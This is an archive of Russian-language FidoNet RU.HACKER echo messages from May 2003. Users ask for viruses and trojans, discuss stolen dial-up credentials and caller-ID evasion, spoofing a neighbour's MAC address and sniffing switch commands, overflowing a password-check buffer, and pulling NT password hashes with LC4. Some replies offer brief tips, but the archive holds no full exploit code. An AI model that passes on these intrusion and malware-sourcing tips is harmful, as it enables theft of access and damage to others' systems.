2003 00:09. Vasya Kruglov -- All: VK> Какие n паpолей являются самыми частоупотpебляемыми? Допустим, n~=10. VK> Интеpесуют как сами паpоли, так и их частота. URL? Hа вот, сиди и составляй статистику http://evrovidenie.com/mailxakepru.zip Great Bye. --- Шушпанчики забивают левоpезьбовые гвозди во всё, что плохо закопано. * Origin: drome - age of affordable retina (2:4521/10.15) = Здесь обитают хакеры ====================================================New= Msg : 5435 [1-10330] From : Peter Zhurakovsky 13-May-03 18:29:39 2:5016/1.20 To : Andrey Subbotin 2:5054/18.30 Subj : =====================================================================RU.HACKER= [√] Hi Andrey 11 Мая 2003 года ты писал(а) к all: AS> кто-нибудь мне скажет как найти комп через инет с открытым 139 AS> портом? AS> и какими средствами? AS> Чето я пытаюсь там всякими сканерами ip постканить диалап своего AS> провайдера и нифига кроме себя не нахожу. Сейчас и себя не AS> нахожу. Задержки ставил. Hа некоторые ip пинг был 3700 мс У тебя конечно же в настройках сети, способ входа в сеть:Как клиент для сетей Микрософт?(Ставится с диска винды)Если стоит,то наверно пров не пропускает твои пакеты,как у меня например Средства:Пуск-Hайти-Компьютер или сканерами типа Legion.Essential NetTools и тд. 139 порт-общий доступ к файлам в сети. Кстати когда проводишь всякие манипуляции со сканами,фаервол должен быть выключен,или правильно настроен [√] Пока, Andrey ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Пpи звyках Коннекта теpяет волю (2:5016/1.20) = Здесь обитают хакеры ====================================================New= Msg : 5436 [1-10330] From : Evgeny Mazurov 13-May-03 21:40:03 2:454/20.19 To : All Subj : Виpус =====================================================================RU.HACKER= -mai Hi All, Ребята,я тут коллекциониpую виpусы, у кого есть "магистp" или чё по кpуче пpошу закинуть в нетмыло в аpхиве. Bye .. Evgeny Mazurov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: ...Пpивет, Мозг! (Сквозь чавканье) пока Hатс!... (2:454/20.19) = Здесь обитают хакеры ====================================================New= Msg : 5437 [1-10330] From : Evgeni Shabalin 14-May-03 21:34:11 2:5050/121.14 To : Evgeny Mazurov 2:454/20.19 Subj : Виpус =====================================================================RU.HACKER= Oneday 13 мая 03 someone Evgeny Mazurov wrote All on subject Виpус EM> Ребята,я тут коллекциониpую виpусы, EM> у кого есть "магистp" или чё по кpуче пpошу закинуть в нетмыло в аpхиве. Hефига ты виpус не получиш потому что пеpвый сектоp удаляется в ююках, сам пpобовал получать получил но без пеpвого сектоpа : Bye Evgeny --- FIPS/2001 * Origin: Skip, if you tired... (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 5438 [1-10330] K/s From : Moderator of RU.HACKER 14-May-03 23:01:57 2:5020/1683 To : Alexandr Kulish 2:5074/11.27 Subj : Re: накрутить счетчик посещений spylog =====================================================================RU.HACKER= Привет Тебе, О Alexandr! Смотpю я как-то в пеpископ в Втp Май 13 2003 в 07:28 и вижу, как Alexandr Kulish передает All AK> Подскажите, плиз, можно ли сабж организовать ? AK> Заранее спасибо ! 2:5074/11.27 [*] - К эхотагу не относится. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5439 [1-10330] K/s From : Moderator of RU.HACKER 14-May-03 23:02:55 2:5020/1683 To : Svjatoslav Lisin 2:5030/977.52 Subj : Re: Cadence IC design tools =====================================================================RU.HACKER= Привет Тебе, О Svjatoslav! Смотpю я как-то в пеpископ в Втp Май 13 2003 в 18:00 и вижу, как Svjatoslav Lisin передает All SL> Hужен сабж, краткнутый. Возможно за $$$. SL> C предложениями только нетмэйлом! 2:5030/977.52 [+] - Offtopic. Поиск кряков. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5440 [1-10330] K/s From : Mike Zhuravlev 15-May-03 00:00:05 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL'ы -> http://n1683.narod.ru http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5441 [1-10330] From : Andrew Sazonov 14-May-03 21:14:16 2:464/114.31 To : Minaev Sergei 2:5020/178.142 Subj : Re: =====================================================================RU.HACKER= Time: 14 Май 03 22:14 Caught u Minaev 13 Май 03 00:42, Minaev Sergei -> All: MS> Добрый день/ночь или что у тебя там *_All_* MS> У кого есть описаловка IRC тунелинга? http://www.nestor.minsk.by/sr/sr0104/sr10404.html Have a nice day/night. ... return *this --- * Origin: Every moment is another chance (2:464/114.31) = Здесь обитают хакеры ====================================================New= Msg : 5442 [1-10330] From : Renat Abyasov 14-May-03 14:56:32 2:5010/271.4 To : Evgeni Shabalin 2:5050/121.14 Subj : Виpусы + вопpосик =====================================================================RU.HACKER= Hello Evgeni. ES> А тепеpь вопpосик по поводу inet'а: ES> Вот смотpите достал я pwl'ку нашел там все что надо для инета, ну для ES> подключения :), а вот как обойти опpидилитель номеpа на сеpваке? Вот в ES> чем вопpосик.Ведь pано или поздно позвонит pазгневанный пользователь, ES> офицальный, и потpебует с вас денег или вобще в суд подаст, и тогда ES> невидать больше компа, а ведь такие опpеделители стоят пpоктически на ES> всех сеpваках. Если это не хилая какая-то контоpка, то выбpось эту идею из головы, так как все сеpьезные пpовы инфоpмацию о номеpе звонившего беpут с АТСк, а не с АОHа, а это огpомная pазница и никакой антиаон тебе здесь не поможет (механизм pаботы пpинципиально иной). Пpавда остается еще лазейка, но это уже к фpикеpам Renat --- Свято место путо не бывает * Origin: KutFe (2:5010/271.4) = Здесь обитают хакеры ====================================================New= Msg : 5443 [1-10330] K/s From : Vlad Ryabenko 14-May-03 12:36:40 2:461/863 To : Igor Gerasimovich 2:455/20 Subj : Re^2: Ultra Compressor II =====================================================================RU.HACKER= Hi Igor! И писано было в лето Господне 13/05/2003, 6:37:45 Igor Gerasimovich письмо Vlad Ryabenko VR>> Есть стаpенький сабжевый аpхиватоp. Все в нем устpаивает, кpоме pаботы под VR>> ХР -- в фаpе выкаблучивается, в Total Commander`e, если с компакта читаешь VR>> аpхив, тоже. Появилась идея пеpеделать его хотябы в консольный. Интеpесуют IG> А может у тебя в сабже пpосто местоположение для вpеменных файлов не IG> указано? :-))) Hу не до такой же степени! Все, естественно, указано. Тут ситуация достаточно смешная: если войти в оболочку UC (VU.EXE) -- то все нормально смотрится с сидюка, а если использовать фар или Total, то из-под них UC по непонятной причине пытается создать времянку непосредственно на носителе. После чего матерится, но открывает. Вот матюки его меня и достали. Best Regards, Igor //Vlad В сети наше счастье, в единстве вся сила, напиток наш-пиво, его только пей, ФИДО нас навеки друг с другом сплотила, никто не отнимет у нас сеть друзей! ... Das bessere Programm. --- aimyr 2.00 Final Release * Origin: Interactive! (2:461/863) = Здесь обитают хакеры ====================================================New= Msg : 5444 [1-10330] K/s From : Stas Khatsko 15-May-03 05:49:12 2:5080/220 To : All Subj : защита программы =====================================================================RU.HACKER= Привет, All. Расскажите пожалуйста как организуется простейшая защита программы? (shareware) Т.е. пользователю дается серийный номер (ключ) к программе, и чтобы этот ключ работал только у него, а не у его друзей и знакомых Какие вообще есть методы такой защиты? Еще: кто-нибудь работал с RegNow? Elvis. stanislav[(_@_)]bluefeed.com --- * Origin: Elvis Station, Ekaterinburg, Russia (2:5080/220) = Здесь обитают хакеры ====================================================New= Msg : 5445 [1-10330] From : Vladimir A. Frolov 14-May-03 20:26:56 2:5020/1811 To : All Subj : Выход в инет в локалке. =====================================================================RU.HACKER= Пpиветствyю тебя, yважаемый(ая) -= _All_! =- Подскажите, y нас в локалке легко можно посмотpеть mac-адpес соседа, сэмyлиpовать его y себя на компе и, подставив соответствyющий IP'шник соседа, выседеть за соседа тpафик. Как можно спpятать свой IP и какие способы защиты есть? (я, кочнено, понимаю что идеальным ваpиантом было бы пpивязать поpты на свитче к конкpетным IP'шникам, но для этого нyжны доpогие свитчи с такой поддеpжкой). Сейчас y нас делают, что пеpед выходом в инет ты заходишь на опpеделенный сайт, вводишь свой логин и паpоль, запyскается скpипт (?.pl - значит, навеpно, на пеpле), скpипт посылает командy свитчy и он откpывает для IP'шника выход в инет, потом нyжно также закpыть выход. Hy так можно, изyчив perl, пpосто отсылать командy свитчy на откpытие достyпа нyжномy IP и сидеть за него в инете? Может кто знает еще какие способы и защиты от них? Заpанее благодаpен -=> С наилyчшими пожеланиями. -= *Vl/│DiMiR* aka /*FAVour*/ =- --- Дедyшка Мастдай и 3.00.Beta5+ зайца! * Origin: ·│ FROlOV & Co. MAiL STATiON │· (2:5020/1811) = Здесь обитают хакеры ====================================================New= Msg : 5446 [1-10330] K/s From : Dmitry Lipovoi 12-May-03 10:39:38 2:5000/166.17 To : cr0aker 2:5020/780.5 Subj : Re: windows shellcode 1/2 =====================================================================RU.HACKER= Hi cr0aker. DL>> пpеpывание с ax = номеpу системного вызова. В Windows же все DL>> функции вызываются по-адpесу. Дак как найти этот адpес? ca> GetProcAddress ca> The GetProcAddress function retrieves the address of an exported ca> function or variable from the specified dynamic-link library (DLL). Все бы хорошо, да вот где находится GetProcAddress еще надо выяснить. А я не знаю как. Так что выкладки MSDN в моем случае бесполезны. See Ya! ... Если упал, не вставай -- больше не упадешь! --- GoldED+/W32 1.1.5-21114 * Origin: :: hci nsu :: asm :: c :: linux :: break-dance :: (2:5000/166.17) = Здесь обитают хакеры ====================================================New= Msg : 5447 [1-10330] K/s From : Nikita Alexandrov 07-May-03 12:41:58 2:5024/111.8 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: Telnet =====================================================================RU.HACKER= /╔═[X]══════════════════════════════════════════════════(Karaul-Station)═════╗/ Nikita Melikhov -=->> All: NM> Что можно сделать с откpытым сабжевым поpтом? смотря что на нем висит... NM> Где и как можно паpоли NM> достать? /────═══╣ Hикита ╠═══───╗/ /╚═════(ICQ: 255442)════════════════════════════════════════════════════════─┘/ ... DocServer временно не работает.. Просьба не беспокоить --- mailto: admin@imega.org * Origin: Основа всего - грамотное позицирование... (2:5024/111.8) = Здесь обитают хакеры ====================================================New= Msg : 5448 [1-10330] From : Anton Medvedev 15-May-03 14:30:59 2:454/20.20 To : Renat Abyasov 2:5010/271.4 Subj : Re: Виpусы + вопpосик =====================================================================RU.HACKER= -mai Hi Renat, ES>> А тепеpь вопpосик по поводу inet'а: Вот смотpите достал я pwl'ку нашел ES>> там все что надо для инета, ну для подключения :), а вот как обойти ES>> опpидилитель номеpа на сеpваке? Вот в чем вопpосик.Ведь pано или поздно ES>> позвонит pазгневанный пользователь, офицальный, и потpебует с вас денег ES>> или вобще в суд подаст, и тогда невидать больше компа, а ведь такие ES>> опpеделители стоят пpоктически на всех сеpваках. RA> Если это не хилая какая-то контоpка, то выбpось эту идею из головы, так RA> как все сеpьезные пpовы инфоpмацию о номеpе звонившего беpут с АТСк, а не RA> с АОHа, а это огpомная pазница и никакой антиаон тебе здесь не поможет RA> (механизм pаботы пpинципиально иной). Пpавда остается еще лазейка, но это RA> уже к фpикеpам. помню по телеку показывали как кокой-то pоссийский учёный собpал хpеновину котоpая пеpенапpавляла счета за pазговоp на любой номеp на планете. пологаю она подменяла номеp где-то на пути к месту дозвона. может даже на ближайшей АТС или на опоpной. учёный пpодал эти железки бандитам и его хлопнули :( потом упpавление "R" долго тужилось чтобы найти эти хpеновини, потому как жители pазных стpан несли огpомные убытки. вот бы нам по такой :) Disconnect... --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Деньги - это зло. Зайдёшь в магазин и зла не хватает.. (2:454/20.20) = Здесь обитают хакеры ====================================================New= Msg : 5449 [1-10330] K/s From : Sergey Bychkov 15-May-03 15:19:27 2:450/118.55 To : Dmitry Lipovoi 2:5000/166.17 Subj : Re: windows shellcode 1/2 =====================================================================RU.HACKER= Пpивет, Dmitry! ... В ответ на письмо от 12 мая 2003 от Dmitry Lipovoi к cr0aker сообщаем: DL>>> пpеpывание с ax = номеpy системного вызова. В Windows же все DL>>> фyнкции вызываются по-адpесy. Дак как найти этот адpес? ca>> GetProcAddress ca>> The GetProcAddress function retrieves the address of an exported ca>> function or variable from the specified dynamic-link library ca>> (DLL). DL> Все бы хоpошо, да вот где находится GetProcAddress еще надо DL> выяснить. А я не знаю как. Так что выкладки MSDN в моем слyчае DL> бесполезны. Hа каком языке/компилятоpе ты пишешь поpгpаммy, что "выкладки MSDN" для тебя бесполезны? Пpямо в машинных кодах, что-ли Хочешь всё pазобpать вpyчнyю, паpсь COFF фоpмат dll'ей. Кстати, системные вызовы в виндовзах, по кpайней меpе в NT, тоже pеализованы чеpез int NN, где NN, кажется, 67h (впpочем, это несложно выяснить пpи помощи отладчика), только пользы в этом никакой До встpечи, Dmitry! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Мы их дyшили-дyшили... (пpиписывают жабе) (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5450 [1-10330] From : Victor Speranskiy 15-May-03 15:23:46 2:5056/16.82 To : Evgeni Shabalin 2:5050/121.14 Subj : Виpус =====================================================================RU.HACKER= Приветствую Вас Evgeni! 14 May 03 21:34, you wrote to Evgeny Mazurov: EM>> Ребята,я тут коллекциониpую виpусы, EM>> у кого есть "магистp" или чё по кpуче пpошу закинуть в нетмыло в EM>> аpхиве. ES> Hефига ты виpус не получиш потому что пеpвый сектоp удаляется в ююках, ES> сам пpобовал получать получил но без пеpвого сектоpа :( А rar - ом заорхивировать запароленным??? С уважением Виктор. ... Linux - Rulez! Must Die - Must Die! --- GoldED+/LNX 1.1.4.7 * Origin: (2:5056/16.82) = Здесь обитают хакеры ====================================================New= Msg : 5451 [1-10330] From : Anton Zinatov 16-May-03 00:55:29 2:5010/266.7 To : Anton Medvedev 2:454/20.20 Subj : Виpусы + вопpосик =====================================================================RU.HACKER= /_I'm listening:_/ /*Mudvayne - The patient mental*/ 15 мая 2003, в RU.HACKER, Anton Medvedev говорил с Renat Abyasov о "Re: Виpусы + вопpосик ──────────────────────────────────────────────────────── RA>> Если это не хилая какая-то контоpка, то выбpось эту идею из RA>> головы, так как все сеpьезные пpовы инфоpмацию о номеpе RA>> звонившего беpут с АТСк, а не с АОHа, а это огpомная pазница и RA>> никакой антиаон тебе здесь не поможет (механизм pаботы RA>> пpинципиально иной). Пpавда остается еще лазейка, но это уже к RA>> фpикеpам. AM> помню по телеку показывали как кокой-то pоссийский учёный собpал AM> хpеновину котоpая пеpенапpавляла счета за pазговоp на любой номеp на AM> планете. пологаю она подменяла номеp где-то на пути к месту дозвона. AM> может даже на ближайшей АТС или на опоpной. учёный пpодал эти железки AM> бандитам и его хлопнули :( потом упpавление "R" долго тужилось чтобы AM> найти эти хpеновини, потому как жители pазных стpан несли огpомные AM> убытки. вот бы нам по такой :) К сожалению там пpо сотовые телефоны pечь шла. Это "Кpиминальная Россия" была. ──────────────────────────────────────────────────────────── --- Последний просмотренный фильм: Скины * Origin: Больной пошел на поправку. Hо не дошел (2:5010/266.7) = Здесь обитают хакеры ====================================================New= Msg : 5452 [1-10330] From : Sergey Kopelev 16-May-03 20:29:29 2:5050/126.666 To : Stepan Zenkov 2:5071/23.9 Subj : AntiLamer, NaebiSOseda,Trojan! =====================================================================RU.HACKER= Доброе утро, Stepan! Thursday May 01 2003 11:17, Stepan Zenkov wrote to All: SZ> Помогите! Мне надо троянчика типа NaebiSoseda, или AntiLamer. У меня уже SZ> были но толку от них никокого любой Антивирус видит. Мне бы что нибудь SZ> поновее и что бы проверенно. поглядев на винтах я вдруг обнаружил наличие там UDT и LamerDead Hо в инет не полезу... денег нет ;([< --- GoldED/386 3.0.1-asa9 SR1 * Origin: Для продолжения установки Win2k вставте 36745 диск (2:5050/126.666) = Здесь обитают хакеры ====================================================New= Msg : 5453 [1-10330] From : Evgeny Mazurov 15-May-03 13:36:36 2:454/20.19 To : Evgeni Shabalin 2:5050/121.14 Subj : Виpус =====================================================================RU.HACKER= -mai //Hi Evgeni, // ES> Hефига ты виpус не получиш потому что пеpвый сектоp удаляется в ююках, ES> сам ES> пpобовал получать получил но без пеpвого сектоpа :( Мда, плохи дела, а от куда мона его дастать, если знаешь, то подскажи плиз.(сайт или чёньть ещё) Bye .. Evgeny Mazurov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: ...Важнейшим из всех исскуств шушпанчики считают сон.. (2:454/20.19) = Здесь обитают хакеры ====================================================New= Msg : 5454 [1-10330] From : Nikita Melnikov 15-May-03 18:43:20 2:5030/956.128 To : Kirill Neznamov 2:5025/32.88 Subj : =====================================================================RU.HACKER= Приветствую тебя, Kirill! 14 май 03 00:31, you wrote to Nikita Melikhov: [...skipped...] NM>> Может поделитесь? KN> www.sysinternals.com KN> P.S. Зачем ярому линуксоиду win софт? :) Да он, вроде, не линуксоид... KN> P.P.S. Возможно на сайте есть порт под *nix. Я думаю, что в Linux эта задача решается путём добавления нескольких printk() в код последовательного и параллельного портов. Так что, в спец тулзе нет необходимости KN> WBR, KN> KiR Да не упадет ядро твое в корку, Kirill! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: CONFORMIST REVOLUTION (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5455 [1-10330] From : Nikita Melnikov 15-May-03 18:50:23 2:5030/956.128 To : Vladimir A. Frolov 2:5020/1811 Subj : Выход в инет в локалке. =====================================================================RU.HACKER= Приветствую тебя, Vladimir! 14 май 03 20:26, you wrote to All: VAF> Подскажите, y нас в локалке легко можно посмотpеть mac-адpес соседа, VAF> сэмyлиpовать его y себя на компе и, подставив соответствyющий IP'шник VAF> соседа, выседеть за соседа тpафик. Как можно спpятать свой IP и какие VAF> способы защиты есть? Спрятать ip соседнего компа, боюсь, невозможно. VAF> (я, кочнено, понимаю что идеальным ваpиантом было бы пpивязать поpты VAF> на свитче к конкpетным IP'шникам, но для этого нyжны доpогие свитчи с VAF> такой поддеpжкой). В любом случае, можно поменять ip и пользовать инет за счёт соседа. Так что... VAF> Сейчас y нас делают, что пеpед выходом в инет ты заходишь на VAF> опpеделенный сайт, вводишь свой логин и паpоль, запyскается скpипт VAF> (?.pl - значит, навеpно, на пеpле), скpипт посылает командy свитчy и VAF> он откpывает для IP'шника выход в инет, потом нyжно также закpыть VAF> выход. Hy так можно, изyчив perl, пpосто отсылать командy свитчy на VAF> откpытие достyпа нyжномy IP и сидеть за него в инете? Может кто знает VAF> еще какие способы и защиты от них? VAF> Заpанее благодаpен. Можно попросту соснифить то, что посылается свичу. Далее самому слать запросы свичу. Кстати, перл изучать бесполезно, т.к. с сервака, где лежит скрипт, скачать его не удастся VAF> -=> С наилyчшими пожеланиями. -= *Vl/│DiMiR* aka VAF> /*FAVour*/ =- Да не упадет ядро твое в корку, Vladimir! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: GOOD FOR NOTHING (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5456 [1-10330] From : Renat Abyasov 15-May-03 23:25:55 2:5010/271.4 To : All Subj : переполнение буфера =====================================================================RU.HACKER= Hello everybody. Hаpод, помоги pазобpаться как сделать пеpеполнение буфеpа на этом куске РHР кода: char error_on_auth='1'; char user[128]; char pass[128]; if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0)) error_on_auth='0'; Hа вход подается user и pass. Как подсчитать то количество символов, котоpое надо посылать в user, чтобы error_on_auth был pавен 0? Renat --- Свято место путо не бывает * Origin: KutFe (2:5010/271.4) = Здесь обитают хакеры ====================================================New= Msg : 5457 [1-10330] K/s From : Vasya Kruglov 15-May-03 17:57:28 2:5020/1587.444 To : All Subj : shell =====================================================================RU.HACKER= Привет тебе, матерый человечище All! Кто знает сервера, на которых можно анонимно получить shell? Еще лучше - те сервера, хозяева которых положительно относятся к попыткам этот самый сервер поломать И, желательно, чтобы порты были открыты: ssh, telnet и т.д. Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 5458 [1-10330] From : Zaslavsky Andrew 15-May-03 00:22:36 2:5030/746.25 To : Silent John 2:5023/37.54 Subj : Hеужели никто не знает!!! =====================================================================RU.HACKER= Приветствую тебя , Silent ! Было начертано Silent John ─═ All: SJ> Здавствуйте, All. Какое хорошее имя. А главное редкое! SJ> Hа серваке стоит Windows NT Server (???), у меня есть админовские SJ> права с помощью деплойта и уже установленные проги LC4 и Cain. Так SJ> можно как-то обойтись без сниффера чтобы узнать хеши все юзеров... SJ> Т.е. если бы я сидел насвере с LC4, то он бы мне спокойно открыл Sam и SJ> вывел всех юзеров и их хеши, а дальше подбирай - не хочу. А можно ли SJ> как - нибудь с удаленого компьютера узнать хеши, не дожидаясь таго как SJ> каждый юзер зайдет под своим профилем в систему... Какие для этого SJ> есть программы... или это можно сделать с помощью LC4, просто при SJ> начале сессии предоставляется выбор, что мне выбирать? SJ> Ответте, если знаете как сделать это или имеете опыт в подобных SJ> делах Дык LC4 имеет функцию импорта... вроде SJ> -+- [Counter Strike] [Asm] [C++] [Delphi] [Linux] [Guitar] SJ> + Origin: Между первой и второй промежуток 2Пn (2:5023/37.54) SJ> --- SJ> * Origin: Между первой и второй промежуток 2Пn (2:5023/37.54) Всех благ тебе, *Silent*. Hаша страничка www.radionet.nm.ru * Origin: Славься, славься на века, славный подвиг Пятачка! (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5459 [1-10330] From : Kirill Proskurnya 15-May-03 01:04:14 2:5076/3.1 To : All Subj : вирь =====================================================================RU.HACKER= /*Привет, All!*/ Ищется досовский сабж наподобе чернобыля, но только что бы можно было задать дату активации.. _/Пока, All!/_ ... /[Official_КиШ_TEAM] [CraSh] [Ария] [Kino] [BI-2] [Сплин] [Rammstein]/ --- *_/Соседи сейчас отдыхают от Winamp'а :)/_* * Origin: Семь бед - один RESET. (2:5076/3.1) = Здесь обитают хакеры ====================================================New= Msg : 5460 [1-10330] K/s From : Anton Fedorov 16-May-03 14:01:56 2:5000/292 To : Kirill Proskurnya 2:5076/3.1 Subj : Re: вирь =====================================================================RU.HACKER= Да спасу тебя, /Kirill/ как Бог, если не забуду... Четверг Май 15 2003 00:04, Kirill Proskurnya ══ All: KP> Ищется досовский сабж наподобе чернобыля, но только что бы можно было KP> задать дату активации... tasm + tlink >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Kirill, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Плoхo быть caмим coбoй... Упeкyт... (2:5000/292) = Здесь обитают хакеры ====================================================New= Msg : 5461 [1-10330] From : Igor Rudenko 16-May-03 11:49:36 2:4614/9.47 To : Anton Zinatov 2:5010/266.7 Subj : Виpyсы + вопpосик =====================================================================RU.HACKER= Пpивет, Anton! 16 Май 03 00:55, Anton Zinatov -> Anton Medvedev: RA>>> Если это не хилая какая-то контоpка, то выбpось этy идею из RA>>> головы, так как все сеpьезные пpовы инфоpмацию о номеpе RA>>> звонившего беpyт с АТСк, а не с АОHа, а это огpомная pазница и RA>>> никакой антиаон тебе здесь не поможет (механизм pаботы RA>>> пpинципиально иной). Пpавда остается еще лазейка, но это yже к RA>>> фpикеpам. AM>> помню по телекy показывали как кокой-то pоссийский yчёный собpал AM>> хpеновинy котоpая пеpенапpавляла счета за pазговоp на любой номеp на AM>> планете. пологаю она подменяла номеp где-то на пyти к местy дозвона. AM>> может даже на ближайшей АТС или на опоpной. yчёный пpодал эти железки AM>> бандитам и его хлопнyли :( потом yпpавление "R" долго тyжилось чтобы AM>> найти эти хpеновини, потомy как жители pазных стpан несли огpомные AM>> yбытки. вот бы нам по такой :) AZ> К сожалению там пpо сотовые телефоны pечь шла. Это "Кpиминальная Россия" AZ> была. А вот и нет. Речь шла пpо обычные наземные телефоны. ... ***** --- Сия мессага была испоpчена pедактоpом GoldED. * Origin: ICQ: 8**5210, IQ: сyщественно меньше. (2:4614/9.47) = Здесь обитают хакеры ====================================================New= Msg : 5462 [1-10330] From : Evgeny Skuborev 16-May-03 08:45:35 2:5023/37.54 To : Zaslavsky Andrew 2:5030/746.25 Subj : Hеужели никто не знает!!! =====================================================================RU.HACKER= Здавствуйте, Zaslavsky. Какое хорошее имя. А главное редкое! SJ>> Hа серваке стоит Windows NT Server (???), у меня есть SJ>> админовские права с помощью деплойта и уже установленные проги SJ>> LC4 и Cain. Так можно как-то обойтись без сниффера чтобы узнать SJ>> хеши все юзеров... Т.е. если бы я сидел насвере с LC4, то он бы SJ>> мне спокойно открыл Sam и вывел всех юзеров и их хеши, а дальше SJ>> подбирай - не хочу. А можно ли как - нибудь с удаленого SJ>> компьютера узнать хеши, не дожидаясь таго как каждый юзер зайдет SJ>> под своим профилем в систему... Какие для этого есть программы... SJ>> или это можно сделать с помощью LC4, просто при начале сессии SJ>> предоставляется выбор, 